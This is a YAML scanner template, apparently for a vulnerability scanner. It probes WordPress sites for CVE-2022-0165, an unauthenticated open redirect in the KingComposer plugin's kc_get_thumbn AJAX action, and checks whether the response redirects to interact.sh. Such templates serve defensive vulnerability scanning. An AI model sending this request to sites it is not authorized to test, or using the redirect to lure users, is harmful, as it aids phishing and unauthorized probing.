name: poc-yaml-wordpress-page-builder-kingcomposer-cve-2022-0165-url-redirect
manual: false
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh
            follow_redirects: false
        expression: '"(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$".bmatches(response.raw_header)'
expression: r0()
detail:
    author: Monday
    links:
        - https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb
        - https://nvd.nist.gov/vuln/detail/cve-2022-0165
    vulnerability:
        id: CT-399540
        level: high
        cve: cve-2022-0165
    description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users).
